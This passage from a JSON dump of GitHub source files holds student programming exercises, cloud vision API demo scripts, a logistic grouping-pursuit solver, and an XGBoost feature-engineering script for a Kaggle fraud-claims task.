"license_type": "permissive", "max_line_length": 28, "num_lines": 5, "path": "/java/projects/gridworld/README.md", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# GridWorld\n\n+ 当时写的很仓促,好几次都是踩线检查。\n+ 最开始浪着不用IDE,后面打脸\n+ 具体参考2015中级实训的参考界面吧,不做过多描述。\n" }, { "alpha_fraction": 0.6721698045730591, "alphanum_fraction": 0.698113203048706, "avg_line_length": 21.342105865478516, "blob_id": "6356b5cbe31b13a76caca21280b6c43a60969347", "content_id": "ef628cd44b13091f2be2b5f8850e6211f1c7e5aa", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 848, "license_type": "permissive", "max_line_length": 105, "num_lines": 38, "path": "/cplusplus/projects/Cocos2dx/hardwork/homework/week12/Classes/Monster.cpp", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include\"Monster.h\"\nUSING_NS_CC;\n\nFactory* Factory::factory = NULL;\nFactory::Factory() {\n\tinitSpriteFrame();\n}\nFactory* Factory::getInstance() {\n\tif (factory == NULL) {\n\t\tfactory = new Factory();\n\t}\n\treturn factory;\n}\nvoid Factory::initSpriteFrame(){\n\tauto texture = Director::getInstance()->getTextureCache()->addImage(\"Monster.png\");\n\tmonsterDead.reserve(4);\n\tfor (int i = 0; i < 4; i++) {\n\t\tauto frame = SpriteFrame::createWithTexture(texture, CC_RECT_PIXELS_TO_POINTS(Rect(258-48*i,0,42,42)));\n\t\tmonsterDead.pushBack(frame);\n\t}\n}\n\nSprite* Factory::createMonster() {\n\tSprite* mons = Sprite::create(\"Monster.png\", CC_RECT_PIXELS_TO_POINTS(Rect(364,0,42,42)));\n\tmonster.pushBack(mons);\n\treturn mons;\n}\n\nvoid Factory::removeMonster(Sprite* sp) {\n\n}\nvoid Factory::moveMonster(Vec2 playerPos,float time){\n\n}\n\nSprite* Factory::collider(Rect rect) {\n\n}" }, { "alpha_fraction": 0.39024388790130615, "alphanum_fraction": 0.39024388790130615, "avg_line_length": 16.428571701049805, "blob_id": "900cd9065f93cc7d2ee30a5989e9dfb01264bd12", "content_id": "37bca41dd4dada1db2fbe6482db12a7a6a3ed66c", 
"detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 123, "license_type": "permissive", "max_line_length": 30, "num_lines": 7, "path": "/c/hardwork/hardway/static.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n\t int main()\n\t {\n\t static double x;\n\t int x;\n\t printf(\"x is %d\", x);\n\t }\n\n" }, { "alpha_fraction": 0.7209302186965942, "alphanum_fraction": 0.724252462387085, "avg_line_length": 20.5, "blob_id": "1e903bda9dcf30d58f0778c9314b09056ec17127", "content_id": "13b4f1621acf0dffa253f92371dc10e199b4b5c8", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 301, "license_type": "permissive", "max_line_length": 59, "num_lines": 14, "path": "/c/projects/MPI/helloworld/README.md", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# How to run it\n\n+ I asume you use linux, for instance ubuntu\n+ then use `sudo apt-get install libopenmpi-dev` to install\n+ use `mpicc helloworld.c` to compile c code to `a.out`\n+ then use `mpirun -np 4 a.out` to run.\n\nyou will see some output like\n```\nhelloworld\nhelloworld\nhelloworld\nhelloworld\n``` " } ]
202
rheehot/visionAI_study
https://github.com/rheehot/visionAI_study
edc14833031342956ba599858825773cbe4dca6c
bc9ba77e279a6060fd73c0b4909895a2982399b4
2e22bafda4543ea2682057cac98b3cd6b9ca0a62
refs/heads/main
2023-01-06T09:09:57.054221
2020-10-29T04:57:29
2020-10-29T04:57:29
308,221,593
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6890624761581421, "alphanum_fraction": 0.706250011920929, "avg_line_length": 31.049999237060547, "blob_id": "ba60dd9d7e12c7f9e987c809d268a18316a8188b", "content_id": "6bd4733344441622906deda2607fb0436f8f2f51", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 640, "license_type": "no_license", "max_line_length": 62, "num_lines": 20, "path": "/PycharmProjects/IBMWatsonVisualRecognitionAPI/Createclassifier.py", "repo_name": "rheehot/visionAI_study", "src_encoding": "UTF-8", "text": "import json\nfrom ibm_watson import VisualRecognitionV3\nfrom ibm_cloud_sdk_core.authenticators import IAMAuthenticator\n\nauthenticator = IAMAuthenticator('[IAMAuthenticator_key]')\nvisual_recognition = VisualRecognitionV3(\n version='2018-03-19',\n authenticator=authenticator\n)\nvisual_recognition.set_service_url('[server_url]')\n\n\nwith \\\n open('./resources/husky.zip', 'rb') as husky, \\\n open('./resources/cats.zip', 'rb') as cats:\n model = visual_recognition.create_classifier(\n 'dogs',\n positive_examples={'husky': husky},\n negative_examples=cats).get_result()\nprint(json.dumps(model, indent=2))" }, { "alpha_fraction": 0.6345177888870239, "alphanum_fraction": 0.6903553009033203, "avg_line_length": 20.88888931274414, "blob_id": "4eb892c14bfad690c113eb90e2a327e16d79305e", "content_id": "c90e5c925e17f17a4b0554ddc4897e1bbc02d73b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 197, "license_type": "no_license", "max_line_length": 66, "num_lines": 9, "path": "/PycharmProjects/AmazonRekognitionAPI/aws_connect.py", "repo_name": "rheehot/visionAI_study", "src_encoding": "UTF-8", "text": "import boto3\n\ns3 = boto3.resource('s3')\n\nfor bucket in s3.buckets.all():\n print(bucket.name)\n\ndata = open('puppies.jpg', 'rb')\ns3.buckets('vision20211').put_object(Key='puppies.jpg', Body=data)\n" }, { "alpha_fraction": 0.7735576629638672, 
"alphanum_fraction": 0.7740384340286255, "avg_line_length": 46.29545593261719, "blob_id": "792e71e93bbb0886dce6b78a865d1b40a7838540", "content_id": "75d10e4b94afb58ac7a040c950a1a0dcb15e1c80", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2080, "license_type": "no_license", "max_line_length": 150, "num_lines": 44, "path": "/PycharmProjects/MicrosoftAzureCognitiveAPI/detection_face.py", "repo_name": "rheehot/visionAI_study", "src_encoding": "UTF-8", "text": "from azure.cognitiveservices.vision.computervision import ComputerVisionClient\n#from azure.cognitiveservices.vision.computervision.models import OperationStatusCodes\nfrom azure.cognitiveservices.vision.computervision.models import VisualFeatureTypes\nfrom msrest.authentication import CognitiveServicesCredentials\n\nfrom array import array\nimport os\nfrom PIL import Image\nimport sys\nimport time\n\n# Add your Computer Vision subscription key to your environment variables.\nif 'COMPUTER_VISION_SUBSCRIPTION_KEY' in os.environ:\n subscription_key = os.environ['COMPUTER_VISION_SUBSCRIPTION_KEY']\nelse:\n print(\"\\nSet the COMPUTER_VISION_SUBSCRIPTION_KEY environment variable.\\n**Restart your shell or IDE for changes to take effect.**\")\n sys.exit()\n# Add your Computer Vision endpoint to your environment variables.\nif 'COMPUTER_VISION_ENDPOINT' in os.environ:\n endpoint = os.environ['COMPUTER_VISION_ENDPOINT']\nelse:\n print(\"\\nSet the COMPUTER_VISION_ENDPOINT environment variable.\\n**Restart your shell or IDE for changes to take effect.**\")\n sys.exit()\n\n\n\ncomputervision_client = ComputerVisionClient(endpoint, CognitiveServicesCredentials(subscription_key))\n\n# Get an image with faces\nremote_image_url_faces = \"https://raw.githubusercontent.com/Azure-Samples/cognitive-services-sample-data-files/master/ComputerVision/Images/faces.jpg\"\n# Select the visual feature(s) you want.\n\nremote_image_features = [\"faces\"]\n# Call the API with 
remote URL and features\ndetect_faces_results_remote = computervision_client.analyze_image(remote_image_url_faces, remote_image_features)\n# Print the results with gender, age, and bounding box\nprint(\"Faces in the remote image: \")\nif (len(detect_faces_results_remote.faces) == 0):\n print(\"No faces detected.\")\nelse:\n for face in detect_faces_results_remote.faces:\n print(\"'{}' of age {} at location {}, {}, {}, {}\".format(face.gender, face.age,face.face_rectangle.left, face.face_rectangle.top, \\\n face.face_rectangle.left + face.face_rectangle.width, \\\n face.face_rectangle.top + face.face_rectangle.height))" }, { "alpha_fraction": 0.7284595370292664, "alphanum_fraction": 0.732375979423523, "avg_line_length": 29.639999389648438, "blob_id": "926163c0c711f5817c62841b4332d09e8156b810", "content_id": "f7a95d36cf06ec3dfd761dd46391d0767326bc81", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 766, "license_type": "no_license", "max_line_length": 58, "num_lines": 25, "path": "/PycharmProjects/GoogleVisionAPI/logo_detection.py", "repo_name": "rheehot/visionAI_study", "src_encoding": "UTF-8", "text": "import os, io\nfrom google.cloud import vision\nfrom draw_vertice import drawVertices\n\nos.environ[\"GOOGLE_APPLICATION_CREDENTIALS\"]=r'[KEY.json]'\nclient = vision.ImageAnnotatorClient()\n\nfile_name = 'logos.png'\nimage_folder = './resources/'\nimage_path = os.path.join(image_folder, file_name)\n\nwith io.open(image_path, 'rb') as image_file:\n content = image_file.read()\n\nimage = vision.Image(content=content)\nresponse = client.logo_detection(image=image)\nlogos = response.logo_annotations\n\nfor logo in logos:\n print('Logo Description:', logo.description)\n print('Confidence Score:', logo.score)\n print('-' * 50)\n vertices = logo.bounding_poly.vertices\n print('Vertices Values {0}'.format(vertices))\n drawVertices(content, vertices, logo.description)\n" }, { "alpha_fraction": 0.6499999761581421, 
"alphanum_fraction": 0.6499999761581421, "avg_line_length": 18, "blob_id": "d8ae612091860774877b262adc3e6416ec50b968", "content_id": "09065358215fd27a23b217c93be34118268a0c3f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 20, "license_type": "no_license", "max_line_length": 18, "num_lines": 1, "path": "/README.md", "repo_name": "rheehot/visionAI_study", "src_encoding": "UTF-8", "text": "\"# visionAI_study\" \n" }, { "alpha_fraction": 0.6710424423217773, "alphanum_fraction": 0.6826254725456238, "avg_line_length": 24.39215660095215, "blob_id": "8d58995529a85715d4b92caca28758df589c7603", "content_id": "aa5211f334717d67ba8ef7877113ad4fe29c2e84", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1295, "license_type": "no_license", "max_line_length": 83, "num_lines": 51, "path": "/PycharmProjects/GoogleVisionAPI/video_text_detection.py", "repo_name": "rheehot/visionAI_study", "src_encoding": "UTF-8", "text": "import io\nimport os\nimport cv2\nfrom PIL import Image\n\n# Imports the Google Cloud client library\nfrom google.cloud import vision\n#from google.cloud.vision import types #pip install google-cloud-vision == 1.0.0\n\nos.environ[\"GOOGLE_APPLICATION_CREDENTIALS\"]=r'[KEY.json]'\n# Instantiates a client\nclient = vision.ImageAnnotatorClient()\n\nfile_name = 'logos.png'\nimage_folder = './resources/'\nimage_path = os.path.join(image_folder, file_name)\n\ndef detect_text(path):\n \"\"\"Detects text in the file.\"\"\"\n with io.open(path, 'rb') as image_file:\n content = image_file.read()\n\n #image = types.Image(content=content) #pip install google-cloud-vision == 1.0.0\n image = vision.Image(content=content)\n response = client.text_detection(image=image)\n texts = response.text_annotations\n string = ''\n\n for text in texts:\n string+=' ' + text.description\n return string\n\ncap = cv2.VideoCapture(0)\n\nwhile(True):\n # Capture frame-by-frame\n 
ret, frame = cap.read()\n\n file = 'live.png'\n cv2.imwrite( file,frame)\n\n # print OCR text\n print(detect_text(file))\n\n # Display the resulting frame\n cv2.imshow('frame',frame)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n# When everything done, release the capture\ncap.release()\ncv2.destroyAllWindows()\n" }, { "alpha_fraction": 0.7568027377128601, "alphanum_fraction": 0.7602040767669678, "avg_line_length": 27, "blob_id": "2380a8272d28adae4d49a29e12fae038af22fc6b", "content_id": "6fc99530e7842550565d9d9447782637ca24207f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 588, "license_type": "no_license", "max_line_length": 80, "num_lines": 21, "path": "/PycharmProjects/GoogleVisionAPI/text_detection.py", "repo_name": "rheehot/visionAI_study", "src_encoding": "UTF-8", "text": "import io\nimport os\nfrom google.cloud import vision\n# from google.cloud.vision import types\n\nos.environ[\"GOOGLE_APPLICATION_CREDENTIALS\"]=r'[KEY.json]'\n\n# Instantiates a client\nclient = vision.ImageAnnotatorClient()\n\nfile_name = os.path.join(os.path.dirname(__file__), 'resources/GNC_big_1_9.jpg')\nwith io.open(file_name, 'rb') as image_file:\n content = image_file.read()\n\nimage = vision.Image(content=content)\nresponse = client.text_detection(image=image)\ntextAnnotations = response.text_annotations\n\nprint('Faces:')\nfor textAnnotations in textAnnotations:\n print(textAnnotations)\n" }, { "alpha_fraction": 0.6653992533683777, "alphanum_fraction": 0.7072243094444275, "avg_line_length": 25.399999618530273, "blob_id": "499ed9edeced69f29a148897ce41f370ec3ee839", "content_id": "a37654626a93cde12b039c316489db0a07758677", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 263, "license_type": "no_license", "max_line_length": 68, "num_lines": 10, "path": "/PycharmProjects/AmazonRekognitionAPI/main.py", "repo_name": "rheehot/visionAI_study", "src_encoding": "UTF-8", 
"text": "import boto3\n# Let's use Amazon S3\ns3 = boto3.resource('s3')\n\n# Print out bucket names\nfor bucket in s3.buckets.all():\n print(bucket.name)\n# Upload a new file\ndata = open('puppies.jpg', 'rb')\ns3.Bucket('visiondemo2020').put_object(Key='puppies.jpg', Body=data)" }, { "alpha_fraction": 0.6789838075637817, "alphanum_fraction": 0.7043879628181458, "avg_line_length": 32.38461685180664, "blob_id": "e1660376981c8197656261f42a1a2fd8147b5ed7", "content_id": "b7ba6d43b78df52ab393e41e9372e08445435eb9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 471, "license_type": "no_license", "max_line_length": 65, "num_lines": 13, "path": "/PycharmProjects/IBMWatsonVisualRecognitionAPI/detect_face.py", "repo_name": "rheehot/visionAI_study", "src_encoding": "UTF-8", "text": "import json\nfrom watson_developer_cloud import VisualRecognitionV3\n\nvisual_recognition = VisualRecognitionV3(\n\t'2018-03-19', # 해당날짜 또는 그 날짜 이전 API버전 선택\n\turl='https://gateway.watsonplatform.net/visual-recognition/api',\n\tiam_api_key='[iam_api_key]') #낮은 버전:api_key\n\n\nwith open('./moviestars.jpg', 'rb') as images_file:\n faces = visual_recognition.detect_faces(images_file)\n\nprint(json.dumps(faces, indent=2))" }, { "alpha_fraction": 0.7165738344192505, "alphanum_fraction": 0.722841203212738, "avg_line_length": 36.81578826904297, "blob_id": "1a77f95fd30f9d11e852dba9e5a8c2d66b034020", "content_id": "9a1a3a35de170932c3b339ae5d6116a609c7dc22", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1436, "license_type": "no_license", "max_line_length": 102, "num_lines": 38, "path": "/PycharmProjects/GoogleVisionAPI/gcp_connect.py", "repo_name": "rheehot/visionAI_study", "src_encoding": "UTF-8", "text": "import io\nimport os\nfrom google.cloud import vision\n# from google.cloud.vision import types\n\nos.environ[\"GOOGLE_APPLICATION_CREDENTIALS\"]=r'[KEY.json]'\n\n# Instantiates a 
client\nclient = vision.ImageAnnotatorClient()\n\nfile_name = os.path.join(os.path.dirname(__file__), 'resources/moviestars.jpg')\nwith io.open(file_name, 'rb') as image_file:\n content = image_file.read()\n\nimage = vision.Image(content=content)\nresponse = client.face_detection(image=image)\nfaceAnnotations = response.face_annotations\n\nlikehood = ('Unknown', 'Very Unlikely', 'Unlikely', 'Possibly', 'Likely', 'Very Likely')\n\nprint('Faces:')\nfor face in faceAnnotations:\n print('Detection Confidence {0}'.format(face.detection_confidence))\n print('Angry likelyhood: {0}'.format(likehood[face.anger_likelihood]))\n print('Joy likelyhood: {0}'.format(likehood[face.joy_likelihood]))\n print('Sorrow likelyhood: {0}'.format(likehood[face.sorrow_likelihood]))\n print('Surprised ikelihood: {0}'.format(likehood[face.surprise_likelihood]))\n print('Headwear likelyhood: {0}'.format(likehood[face.headwear_likelihood]))\n\n face_vertices = ['({0},{1})'.format(vertex.x, vertex.y) for vertex in face.bounding_poly.vertices]\n print('Face bound: {0}'.format(', '.join(face_vertices)))\n print('')\n\n# response = client.label_detection(image=image)\n# labels = response.label_annotations\n# print('Labels:')\n# for label in labels:\n# print(label.description)" } ]
10
Aryamanz29/m-a-c
https://github.com/Aryamanz29/m-a-c
79617f1b2a3de3dfa93c5bbb1db01abb896eb627
06fdbb253a93bcc065a82cfdeeec74514ba14761
0eb9398f7a7f5699dbe750d84f690f69878be6f6
refs/heads/master
2022-12-23T09:21:24.200295
2020-09-26T03:41:51
2020-09-26T03:41:51
298,730,988
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7474332451820374, "alphanum_fraction": 0.7474332451820374, "avg_line_length": 19.33333396911621, "blob_id": "e50dd5512e91156b1c48f1fe50c0e47e7d04581d", "content_id": "a1eec77ce9c20fefc07c1dd7f61c8c06b258c7b0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 487, "license_type": "no_license", "max_line_length": 44, "num_lines": 24, "path": "/websiteenv/mac/shop/views.py", "repo_name": "Aryamanz29/m-a-c", "src_encoding": "UTF-8", "text": "from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom .models import Product\n\ndef index(request):\n return render(request,\"shop/index.html\")\n\ndef about(request):\n return HttpResponse(\"about\")\n\ndef contact(request):\n return HttpResponse(\"contact\")\n\ndef tracker(request):\n return HttpResponse(\"tracker\")\n\ndef search(request):\n return HttpResponse()\n\ndef productview(request):\n return HttpResponse()\n\ndef checkout(request):\n return HttpResponse()" } ]
1
yuyangstatistics/projects
https://github.com/yuyangstatistics/projects
6f1e8dc5ceb385b9646c7fff91284864e2a40348
6f235ce83d9b82a8e2dbc77a521cf9bdecda56a3
09a8f28c21ed1b8035380f74e8806c8a5bc276d4
refs/heads/main
2023-07-06T14:30:51.117044
2023-07-04T01:46:19
2023-07-04T01:46:19
308,781,333
2
1
null
null
null
null
null
[ { "alpha_fraction": 0.7435897588729858, "alphanum_fraction": 0.7435897588729858, "avg_line_length": 37.5, "blob_id": "99c68171cd9cf4f30a9a1218bf3fe2155f1802a5", "content_id": "3756c8fdd670b230ea5a820210622e9a34c9e5f0", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 78, "license_type": "permissive", "max_line_length": 52, "num_lines": 2, "path": "/rbm_summarizer/start_rbm.sh", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "export PYTHONPATH=`pwd`\npython train_textRBM/run_textRBM.py >& log/rbm_log &\n\n" }, { "alpha_fraction": 0.4615384638309479, "alphanum_fraction": 0.47992992401123047, "avg_line_length": 28.662338256835938, "blob_id": "32d7a2e506694db267e28e8e64db79bc48ed549c", "content_id": "dfb72ddeb346d1d763e4c5cb8e8c573647f4f3cf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6851, "license_type": "no_license", "max_line_length": 101, "num_lines": 231, "path": "/wellsfargo/notebooks/group.py", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "import numpy as np\n\ndef prob_safe(x, b):\n \"\"\" Calculate the probability of Y = 1 given x.\n\n Parameters\n ----------\n x: array\n Features. d-dimensional.\n b: array \n Coefficients. d-dimensional. \n\n Returns\n -------\n Conditional probability of Y = 1 given x.\n \"\"\"\n return 1.0 / (1.0 + np.exp(-np.matmul(x, b)))\n\n\ndef soft_thresh(b, thresh):\n \"\"\" Soft-thresholding function.\n\n Parameters\n ----------\n b: float\n Coefficient. \n thresh: float \n Threshold. \n\n Returns\n -------\n Soft-thresholded coefficient.\n \"\"\"\n if (b > thresh):\n return b - thresh\n elif (b < -thresh):\n return b + thresh\n else:\n return 0.0\n\n\ndef LogitGroupingPursuit(x,\n y,\n lambda_par,\n tau_par=0.1,\n rho=10.0,\n max_iter=1000,\n tol=1e-4):\n \"\"\" Compute the minimizer of Sparse Grouping Pursuit. 
\n\n This implementation combines MM-LLA and ADMM. \n Given an estimate beta(t) at t-th iteration.\n\n (1) Constructing majorization function. \n Pen_0(beta) <= |beta| if |beta(t)| <= tau.\n <= 1 if |beta(t)| >= tau.\n Pen_G(beta) <= |beta(t)_j - beta(t)_j'| if |beta(t)_j - beta(t)_j'| <= tau\n <= 1 if |beta(t)_j - beta(t)_j'| >= tau\n At (t+1)-th iteration, we solve:\n\n minimize\n Loss(beta) + Weighted Lasso_0(beta) + Weighted Lasso_G(beta)\n\n (2) For ADMM, we solve an equivalent minimization:\n\n minimize\n Loss(beta) + Weighted Lasso(gamma1) + Weighted Lasso(gamma2)\n subject to\n gamma1 = beta\n gamma2 = A * beta\n \n where gamma1 is ADMM copy of beta, gamma2 is difference between beta,\n A is a matrix defines gamma2. \n \n (3) Iterate until convergence. \n Zou (2008) proves MM-LLA only need to iterate for 2-3 times. \n\n References:\n MM: Hunter (2000) Quantile regression via an MM algorithm. JCGS. \n LLA: Zou (2008) One-step sparse estimates in nonconcave penalized likelihood models. AoS.\n ADMM: Boyd (2011) Distributed optimization and statistical learning via ADMM.\n\n Parameters\n ----------\n x: array \n Predictor matrix. n by d dimensional.\n\n y: array \n Response. Takes values 0, 1. n-dimensional.\n\n lambda_par: float\n Penalty parameter. \n\n tau_par: float\n Threshold in truncated lasso penalty. \n\n rho: float\n ADMM penalty parameter. For computation only.\n\n max_iter: integer\n Maximum iteration number. \n\n tol: float\n Numerical precision. \n\n Returns\n -------\n A tuple of objects: (beta, gamma1, gamma2, prob_safe(x, beta))\n\n beta: array\n Estimated coefficients. d-dimensional.\n\n gamma1: array\n A copy of beta in ADMM. d-dimensional. For convergence check only. \n\n gamma2: array\n Estimated coefficients difference. (d-1)-dimensional. \n\n prob_safe(x, beta): array\n Estimated probability Y = 1 given x for each observation. 
\n \"\"\"\n\n n, d = x.shape[0], x.shape[1]\n\n beta = np.zeros(d)\n\n for _ in range(3): # LLA loop\n\n # A is matrix that defines linear constraint:\n # gamma1 = beta\n # gamma2 = A * beta \n gamma1 = beta.copy()\n gamma2 = np.zeros(d - 1)\n A = np.zeros((d - 1, d))\n\n idx = np.argsort(beta)\n for i in range(d - 1): \n j, l = idx[i], idx[i + 1]\n gamma2[i] = beta[j] - beta[l]\n A[i, j], A[i, l] = 1.0, -1.0\n\n # defines weights in weighted lasso\n nonzero1 = np.abs(beta) >= tau_par\n nonzero2 = np.abs(gamma2) >= tau_par\n\n # u is dual variable for gamma1 in ADMM\n # w is dual variable for gamma2 in ADMM\n u = np.zeros(d)\n w = np.zeros(d - 1)\n\n for iter in range(max_iter): # ADMM loop\n\n # minimize beta: Newton-Raphson (IRLS). \n for iter_newton in range(max_iter):\n\n p = prob_safe(x, beta)\n\n # gradient\n grad = -np.matmul(\n x.T, y - p) + rho * (beta - gamma1 + u) + rho * np.matmul(\n A.T, (np.matmul(A, beta) - gamma2 + w))\n\n # hessian matrix\n hess = np.matmul(np.matmul(x.T, np.diag(p * (1.0 - p))),\n x) + rho * (np.eye(d) + np.matmul(A.T, A))\n\n beta_tmp = beta - np.linalg.solve(hess, grad)\n\n # for numerical stability, beta is constrained ||beta|| <= 20. 
\n if (np.linalg.norm(beta_tmp) > 20.0):\n beta_tmp = beta_tmp / np.linalg.norm(beta_tmp)\n\n change = beta_tmp - beta\n\n # termination criteria\n if (np.linalg.norm(change) < d * tol):\n break\n\n # update beta\n beta = beta_tmp.copy()\n\n # min gamma1: Proximal gradient, soft-thresholding\n gamma1 = beta + u\n for j in range(d):\n if (not nonzero1[j]):\n gamma1[j] = soft_thresh(gamma1[j],\n lambda_par / (tau_par * rho))\n\n # min gamma2: Proximal gradient, soft-thresholding\n gamma2 = np.matmul(A, beta) + w\n for j in range(d - 1):\n if (not nonzero2[j]):\n gamma2[j] = soft_thresh(gamma2[j],\n lambda_par / (tau_par * rho))\n\n # update u\n r1 = beta - gamma1\n u += r1\n\n # update w\n r2 = np.matmul(A, beta) - gamma2\n w += r2\n\n # termination criteria\n if (np.dot(r1, r1) + np.dot(r2, r2) <= d * tol * tol):\n break\n\n # Grouping the coefficients.\n # Calculate grouped coefficients by average.\n for _ in range(3):\n group = np.zeros(d)\n cutoff = np.abs(gamma2) > tau_par\n k = 0\n idx = np.argsort(beta)\n for i in range(d - 1):\n j, l = idx[i], idx[i + 1]\n if (cutoff[i]):\n group[j], group[l] = k, k + 1\n k = k + 1\n else:\n group[j], group[l] = k, k\n for i in range(k + 1):\n beta[group == i] = beta[group == i].mean()\n beta = np.where(np.abs(beta) <= tau_par, 0, beta)\n\n idx = np.argsort(beta)\n for i in range(d - 1):\n j, l = idx[i], idx[i + 1]\n gamma2[i] = beta[j] - beta[l]\n\n return (beta, gamma1, gamma2, prob_safe(x, beta))" }, { "alpha_fraction": 0.6338720917701721, "alphanum_fraction": 0.643886148929596, "avg_line_length": 45.63934326171875, "blob_id": "34557ae126994b55fa8bd65a197d36ceb488626e", "content_id": "c01b783cbae3c622d15a80e52a065f3b39b3f4aa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5692, "license_type": "no_license", "max_line_length": 112, "num_lines": 122, "path": "/Kaggle_Travelers/notebooks/XGBoost.py", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", 
"text": "##### Import packages #####\nimport numpy as np\nimport pandas as pd\nimport xgboost as xgb\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.model_selection import StratifiedKFold\nfrom sklearn import model_selection\nfrom skopt import BayesSearchCV\nfrom matplotlib import pyplot\nfrom xgboost import plot_importance\nimport warnings\nwarnings.filterwarnings('ignore')\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import roc_curve, auc\n\n##### Feature manipulation #####\ntrain = pd.read_csv(\"train_data_clean_4_grouped.csv\")\ntest = pd.read_csv(\"test_data_clean_4_grouped.csv\")\n\n# Encode gender and living status and state #####\ntrain[\"living_status\"] = pd.Categorical(train[\"living_status\"])\ntrain[\"gender\"] = np.where(train[\"gender\"].str.contains(\"M\"), 1, 0)\ntrain[\"living_status\"] = np.where(train[\"living_status\"].str.contains(\"Rent\"), 1, 0)\n\ntest[\"living_status\"] = pd.Categorical(test[\"living_status\"])\ntest[\"gender\"] = np.where(test[\"gender\"].str.contains(\"M\"), 1, 0)\ntest[\"living_status\"] = np.where(test[\"living_status\"].str.contains(\"Rent\"), 1, 0)\n\n# one-hot encoding for site of state\nstate_dummies = pd.get_dummies(test['state'], \n prefix='state', drop_first=True)\ntest = pd.concat([test, state_dummies], axis=1)\ntest.drop([\"state\"], axis=1, inplace=True)\n\n# one-hot encoding for site of state\nstate_dummies = pd.get_dummies(train['state'], \n prefix='state', drop_first=True)\ntrain = pd.concat([train, state_dummies], axis=1)\ntrain.drop([\"state\"], axis=1, inplace=True)\n\n# Drop month, day and year data, drop vehicle color, zipcode, claim_date, claim_number and SP_Index #####\ntrain.drop([\"claim_month_january\", \"claim_month_february\", \"claim_month_march\", \"claim_month_may\", \n 
\"claim_month_june\", \"claim_month_july\", \"claim_month_august\", \"claim_month_september\", \n \"claim_month_october\", \"claim_month_november\", \"claim_month_december\", \n \"claim_day_monday\", \"claim_day_tuesday\", \"claim_day_wednesday\", \"claim_day_thursday\", \n \"claim_day_saturday\", \"claim_day_sunday\", \"claim_year\", \"claim_day\", \n \"zip_code\", \"claim_date\", \"claim_number\", 'SP_Index', \"vehicle_color_blue\", \n \"vehicle_color_gray\", \"vehicle_color_other\", \"vehicle_color_red\", \n \"vehicle_color_silver\", \"vehicle_color_white\"], axis =1, inplace=True)\n\ntest.drop([\"claim_month_january\", \"claim_month_february\", \"claim_month_march\", \"claim_month_may\", \n \"claim_month_june\", \"claim_month_july\", \"claim_month_august\", \"claim_month_september\", \n \"claim_month_october\", \"claim_month_november\", \"claim_month_december\", \n \"claim_day_monday\", \"claim_day_tuesday\", \"claim_day_wednesday\", \"claim_day_thursday\", \n \"claim_day_saturday\", \"claim_day_sunday\", \"claim_year\", \"claim_day\", \n \"zip_code\", \"claim_date\", \"claim_number\", 'SP_Index', \"vehicle_color_blue\", \n \"vehicle_color_gray\", \"vehicle_color_other\", \"vehicle_color_red\", \n \"vehicle_color_silver\", \"vehicle_color_white\"], axis =1, inplace=True)\n\n\n# Add saftyrating/(number of past claim) feature #####\ntrain['per_saftyrating'] = train['safty_rating']/(train['past_num_of_claims']+1)\ntest['per_saftyrating'] = test['safty_rating']/(test['past_num_of_claims']+1)\n\n\n# Delete some fraud_mean variables #####\ntrain.drop([\"fraud_gender\", \"fraud_marital_status\", \"fraud_high_education_ind\", \"fraud_address_change_ind\", \n \"fraud_living_status\", \"fraud_zip_code\", \"fraud_claim_date\", \"fraud_witness_present_ind\", \n \"fraud_policy_report_filed_ind\", \"fraud_accident_site\", \"fraud_channel\", \"fraud_vehicle_category\",\n \"fraud_vehicle_color\", \"fraud_state\",\"Unem_rate\"],\n axis = 1, inplace = 
